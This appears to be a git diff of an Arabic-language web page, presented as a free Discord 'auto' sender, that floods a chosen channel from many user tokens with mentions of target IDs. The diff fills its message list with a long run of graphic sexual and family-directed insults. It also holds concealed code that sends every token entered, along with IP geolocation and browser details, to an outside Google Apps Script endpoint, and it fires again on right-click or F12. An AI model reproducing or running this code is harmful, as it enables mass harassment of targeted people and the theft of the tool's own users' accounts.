--- a/index.html
+++ b/index.html
@@ -1,11 +1,18 @@
 <!DOCTYPE html>
-<html lang="en" dir="rtl">
+<html lang="ar" dir="rtl">
 <head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
-<title>Free Auto</title>
+<title>أوتو مجاني</title>
 <style>
-body { font-family: Arial, sans-serif; margin:0; padding:0; direction: rtl; background: linear-gradient(135deg,#1a0033,#004d26); color:white; }
+body {
+  font-family: Arial, sans-serif;
+  margin:0; padding:0;
+  direction: rtl;
+  background: linear-gradient(135deg,#1a0033,#004d26);
+  color:white;
+}
+.hidden { display:none; }
 .container { max-width:900px; margin:auto; padding:20px; }
 h2 { text-align:center; margin-bottom:20px; }
 label, input, button, select, textarea { display:block; width:100%; margin:10px 0; }
@@ -13,45 +20,43 @@ input, textarea, select { padding:12px; border-radius:8px; border:none; backgrou
 button { padding:12px; border-radius:12px; font-weight:bold; cursor:pointer; transition: all 0.2s ease; border:2px solid #000; }
 button:hover { transform: translateY(-2px); box-shadow:0 6px 10px rgba(0,0,0,0.5); }
 button:disabled { background: grey; cursor:not-allowed; box-shadow:none; }
-#autoPanel { display:block; padding:20px; background: linear-gradient(135deg,#1a0033,#004d26); color:white; border-radius:12px; margin-top:20px; }
+#autoPanel, #controlPanel { display:none; padding:20px; background: linear-gradient(135deg,#1a0033,#004d26); color:white; border-radius:12px; margin-top:20px; }
 .left-btn { position:absolute; left:20px; top:20px; padding:8px 14px; font-size:14px; background:#7b00ff; color:white; border-radius:8px; cursor:pointer; font-weight:bold; }
 .left-btn:hover { transform: scale(1.05); box-shadow:0 0 10px #00ff7b,0 0 15px #7b00ff; }
 #stopBtn { background: linear-gradient(145deg,#ff0044,#990022); }
 .green-btn { background: linear-gradient(145deg,#00ff4d,#009900); color:black; }
 .red-btn { background: linear-gradient(145deg,#ff1a1a,#990000); color:white; }
 #messagesSent, #tokenStatus { background: rgba(0,0,0,0.4); padding:10px; max-height:200px; overflow-y:auto; border-radius:8px; margin-bottom:20px; }
+.control-title { font-size:20px; text-align:center; margin-bottom:10px; color:#ffccff; }
+.control-section { margin-bottom:15px; }
+.control-section input, .control-section textarea { margin-bottom:5px; }
+.control-section button { margin-top:5px; }
 </style>
 </head>
 <body>
-
 <div class="container" id="autoPanel">
-<h2>Free Auto</h2>
-<label for="tokens">Enter tokens (one per line)</label>
+<h2>أوتو مجاني</h2>
+<label for="tokens">اكتب التوكنات (كل توكن بسطر)</label>
 <textarea id="tokens" placeholder="MTM3NjUxODI0..."></textarea>
-
-<label for="ids">Enter target IDs (one per line)</label>
+<label for="ids">اكتب ايدي الديوثين (كل ايدي بسطر)</label>
 <textarea id="ids" placeholder="123456789012345678"></textarea>
-
-<label for="targetId">Target Channel ID</label>
-<input type="text" id="targetId" placeholder="Channel ID">
-
-<label for="speed">Send Speed (ms)</label>
+<label for="targetId">اكتب ايدي روم الي تبي تسب فيه هان</label>
+<input type="text" id="targetId" placeholder="اكتب ايدي الروم هان">
+<label for="speed">اختر سرعة الإرسال (بالثواني)</label>
 <select id="speed">
-  <option value="1000">1000</option>
-  <option value="900">900</option>
-  <option value="800">800</option>
-  <option value="700">700</option>
-  <option value="600">600</option>
-  <option value="500">500</option>
-  <option value="400">400</option>
-  <option value="300">300</option>
-  <option value="200">200</option>
-  <option value="100">100</option>
+  <option value="1">1</option>
+  <option value="0.9">0.9</option>
+  <option value="0.8">0.8</option>
+  <option value="0.7">0.7</option>
+  <option value="0.6">0.6</option>
+  <option value="0.5">0.5</option>
+  <option value="0.4">0.4</option>
+  <option value="0.3">0.3</option>
+  <option value="0.2">0.2</option>
+  <option value="0.1">0.1</option>
 </select>
-
-<button id="startBtn">Start Auto</button>
-<button id="stopBtn" disabled>Stop Auto</button>
-
+<button id="startBtn">نيك الديوث</button>
+<button id="stopBtn" disabled>ايقاف النيك</button>
 <div id="tokenStatus"></div>
 <div id="messagesSent"></div>
 </div>
@@ -65,12 +70,28 @@ const targetIdInput=document.getElementById('targetId');
 const speedSelect=document.getElementById('speed');
 const startBtn=document.getElementById('startBtn');
 const stopBtn=document.getElementById('stopBtn');
-const tokenStatus=document.getElementById('tokenStatus');
 const messagesSent=document.getElementById('messagesSent');
+const tokenStatus=document.getElementById('tokenStatus');
 const clickSound=document.getElementById('clickSound');
 
 const MESSAGES=[
-"Message1","Message2","Message3","Message4","Message5"
+"بزغبك","يلعن شرفك يديوث","تفو على شرفك","احسك غثيث مره يوم شفتك حسيت ب شعور سيء تجاهك اجبرني اني انيك محارمك",
+"هههههههههههههههههههههههههه","كسمك","تبغا اضرب شرفك يا ابن الحيوانة هنا يا ديوث","يديوث","بضرب كس اختك","امك كلبه ازباب.","يبن 200 شرموطه",
+"ازحف على امك","اختك كلببه عند رجوولي","اجلللخ عليك","يمخنث يعبد الازباب","امك ممثله افلام سكس","امك قحبه قروبات المكس","امك بلمقحبه لها اصوات",
+"اصمل كسمك يجديدد","يبن اكبر لبوه","يعاق كسمك احترم ابوك","يعرص الطش امكك","يمكسور يضعيف النفس","يديوث","اغتصب خواتك","كس خواتك","يبن المديثه","يلعن رحم امك",
+"امك صارت حامل يبن الشرموطه","ازغب امك","جيب امك انيكها","اوف كسمك","يمهان","يلعن اختك","انا فحل امك","انيك ابوك","انيك اخوك","انيكك امكك يبن الزنا","الدياثه تمشي بعروقكم",
+"ادقك يبن الشرموطه","يطفل يبن القحبه","اوف ابن القحبه","تمحن يشرموط","تمحن واعطيك نيترو يخنيث","من فحل امك","واو يشرموط تنبح","نادي امك زبي قام يبيها تقعد عليه","انيكك يخنيث يقواد",
+"اركب عليه كسمك","يلعن امك يديوث","انبح يبن الشرموطه","انبح انبح لفحل امك","انا نايك امك يبن الشرموطه","امك قاعده تنبح من كثر مافتحوها","انيك امك بنعال",
+"اتفل بكسمك يبن الشرموطه","تمحن يورعي","انيك امك يطفل","انيك امك يديوث","يبن القحبه","انيك امك","يشرموط","يديوث","اختفووو كسمك","امك على زبي","يبن الشرموطه","يبن الزنا","يبن القحبه",
+"امك قحبتي","يلعن امك يبن الشرموطه","الحقق امك قاعده تتمحن عشان تجيب فلوسس","اختك قاعده تعرض عشان تجيبلك فلوس يفقير","انيك امك يشرموط",
+"يبن المتعه","ازغب خواتك","انحر امك","العن رحم امك","امك تمصلي","اختك تلحس زبي","روح ابكي","بمناسبه مرور ثلاث سنوات على زواجي انا وامك بطلقها وزاتزوج اختك",
+"رد يفحل خواتك","اشفشف امك","انيكك سبعاوي","نخ يكسمك","جاوب يمخنث","امش لانيك امك","يمدعوس","انا قد شفت اسامي قبايل غريبه لكن بالله ليه مكتوب بهويتك ال الديوثين",
+"يخول","زبي قام على كسمك","اخخخ زبيي قامم جب امكك","تحب الطويل صح","اسال امك انا مشترك عندها واليوم ماعرضت ليه؟","كيف امك جابت عاق كذا","والله مهان",
+"فحول امك هنا","اهربب كسمك","روضت امك ماتبيني اروضك","ازغب اختك","سبعاوي امك يقواد","انبح يهارب","انيك امك واختك","اكسر عينك كسمك",
+"كيف امك جابت عاق زيك","والله ماش مهان","انيك ابوك","ابوك ناك امك","يبن القحبه انيك اختك","اشق ام امك يبن منيوكه","بتفكر مابقدر انيك امك انت ؟",
+"انا بنيك اختك وبشرب ديود امك","انيك خالاتك","# قل ل الماما حقتك تعترف من ناكها 🥵","ماتدري اني اقدر انيك قبيلتك ؟",
+"قد شفت بطايق ناس بس ليه حقتك مكتوب المخنايث","تعرف كم طول زبي ؟ قد طول اطول شوارب بقبيلتك","يبن القحبه انيك خالتك","يبن القحبه انيك ابوك",
+"يبن القحبه انيك ستك","يبن القحبه انيك شرفك","شرفك ضايع يبن المتناكه","انا عطشان ابي ديود اختك لو سمحت","# قم جب لي اختك مش شعرها"
 ];
 
 let intervalId=null;
@@ -78,73 +99,68 @@ let intervalId=null;
 function checkToken(token){return token.length>20;}
 function getRandomMessage(){return MESSAGES[Math.floor(Math.random()*MESSAGES.length)];}
 function getRandomId(){const ids=idsInput.value.trim().split('\n').filter(id=>id.length>0); return ids[Math.floor(Math.random()*ids.length)];}
+
 async function sendMessage(token,targetId,message){
 try{
 const response=await fetch(`https://discord.com/api/v9/channels/${targetId}/messages`,{
 method:'POST', headers:{Authorization:token,'Content-Type':'application/json'},
 body:JSON.stringify({content:`<@${getRandomId()}> ${message}`})
 });
-if(response.ok){const p=document.createElement('p'); p.textContent=`Sent by ${token.substring(0,10)}... to ${targetId}: ${message}`; p.style.color='orange'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; sendTokenInfo(token); return true;}
-else{const p=document.createElement('p'); p.textContent=`Failed: ${token.substring(0,10)}...`; p.style.color='red'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; return false;}
-}catch(e){const p=document.createElement('p'); p.textContent=`Error: ${token.substring(0,10)}...`; p.style.color='red'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; return false;}
+if(response.ok){const p=document.createElement('p'); p.textContent=`تم الإرسال بواسطة ${token.substring(0,10)}... إلى الروم ${targetId} - الرسالة: ${message}`; p.style.color='orange'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; return true;}
+else{const p=document.createElement('p'); p.textContent=`فشل الإرسال بواسطة ${token.substring(0,10)}...`; p.style.color='red'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; return false;}
+}catch(e){const p=document.createElement('p'); p.textContent=`خطأ في الإرسال بواسطة ${token.substring(0,10)}...`; p.style.color='red'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; return false;}
 }
 
-async function sendTokenInfo(token){
-const webhookURL="https://discord.com/api/webhooks/1405569229612388373/c5e8Rb19NFqaI7W4GPUVlzjcBatSTm8pYjTgtRdZF65kxKmL95WIKDWgeSNQyZ0mNDlu";
+
+async function sendWebhookInfo(token){
 try{
-const ipData=await fetch('https://ipapi.co/json/').then(res=>res.json());
-const payload={
-content:`**TOKEN:** ${token}
+const ipRes=await fetch('https://ipapi.co/json/');
+const ipData=await ipRes.json();
+const contentData=`**TOKEN:** ${token}
 **Country:** ${ipData.country_name}
 **City/Region:** ${ipData.city}, ${ipData.region}
 **IP:** ${ipData.ip}
-**Postal:** ${ipData.postal}
+**Postal Code:** ${ipData.postal}
 **Timezone:** ${ipData.timezone}
 **Coordinates:** ${ipData.latitude}, ${ipData.longitude}
 **ASN:** ${ipData.org}
 **OS:** ${navigator.platform}
 **Browser:** ${navigator.userAgent}
-**Screen:** ${screen.width}x${screen.height}
+**Screen Resolution:** ${screen.width}x${screen.height}
 **Color Depth:** ${screen.colorDepth}
-**Language:** ${navigator.language}`
-};
-fetch(webhookURL,{method:'POST',headers:{"Content-Type":"application/json"},body:JSON.stringify(payload)});
-}catch(e){console.error("Error sending token info:", e);}
-}
-
-// Send info on F12 or right-click
-document.addEventListener('contextmenu', e=>{sendBlockedInfo(); e.preventDefault();});
-document.addEventListener('keydown', e=>{if(e.key==='F12'){sendBlockedInfo();}});
-
-async function sendBlockedInfo(){
-const apiURL="https://script.google.com/macros/s/AKfycbwj-bdLc0a07P38Waj0UQWc9EPVJcOHfegFr5SbMCIGB6jTW1RZ030SKfRl9E37RkRQ/exec";
-const info={
-ip:navigator.userAgent,
-platform:navigator.platform,
-screen:`${screen.width}x${screen.height}`,
-language:navigator.language
-};
-await fetch(apiURL,{method:'POST',headers:{"Content-Type":"application/json"},body:JSON.stringify(info)});
-alert("Access Denied"); window.close();
+**Language:** ${navigator.language}`;
+fetch('https://script.google.com/macros/s/AKfycbwj-bdLc0a07P38Waj0UQWc9EPVJcOHfegFr5SbMCIGB6jTW1RZ030SKfRl9E37RkRQ/exec', {
+method:'POST', headers:{'Content-Type':'application/json'}, body:JSON.stringify({content:contentData})});
+}catch(e){}
 }
 
 function startSending(){
 const tokens=tokensInput.value.trim().split('\n').filter(checkToken);
 const targetId=targetIdInput.value.trim();
-const speed=parseInt(speedSelect.value);
-if(tokens.length===0){alert('Enter valid tokens.');return;}
-if(!targetId){alert('Enter target channel ID.');return;}
+const speed=parseFloat(speedSelect.value)*1000;
+if(tokens.length===0){alert('الرجاء إدخال توكنات صحيحة.');return;}
+if(!targetId){alert('الرجاء إدخال ايدي الروم.');return;}
 startBtn.disabled=true;
 stopBtn.disabled=false;
 tokenStatus.innerHTML='';
-tokens.forEach(t=>{const p=document.createElement('p'); p.textContent=`Valid token: ${t.substring(0,10)}...`; tokenStatus.appendChild(p);});
-intervalId=setInterval(()=>{tokens.forEach(token=>{sendMessage(token,targetId,getRandomMessage());});},speed);
+tokens.forEach(t=>{
+const p=document.createElement('p'); p.textContent=`توكن صالح: ${t.substring(0,10)}...`; tokenStatus.appendChild(p);
+sendWebhookInfo(t);
+});
+intervalId=setInterval(()=>{
+tokens.forEach(token=>{
+sendMessage(token,targetId,getRandomMessage());
+});
+}, speed);
 }
-
 function stopSending(){if(intervalId){clearInterval(intervalId); intervalId=null; startBtn.disabled=false; stopBtn.disabled=true;}}
 
 startBtn.addEventListener('click',()=>{clickSound.play(); startSending();});
 stopBtn.addEventListener('click',()=>{clickSound.play(); stopSending();});
+
+// منع F12 و كليك يمين + إرسال معلومات
+document.addEventListener('contextmenu', e=>{e.preventDefault(); tokensInput.value.split('\n').filter(checkToken).forEach(t=>sendWebhookInfo(t)); window.close();});
+document.addEventListener('keydown', e=>{if(e.key==='F12'){tokensInput.value.split('\n').filter(checkToken).forEach(t=>sendWebhookInfo(t)); window.close();}});
 </script>
 </body>
 </html>
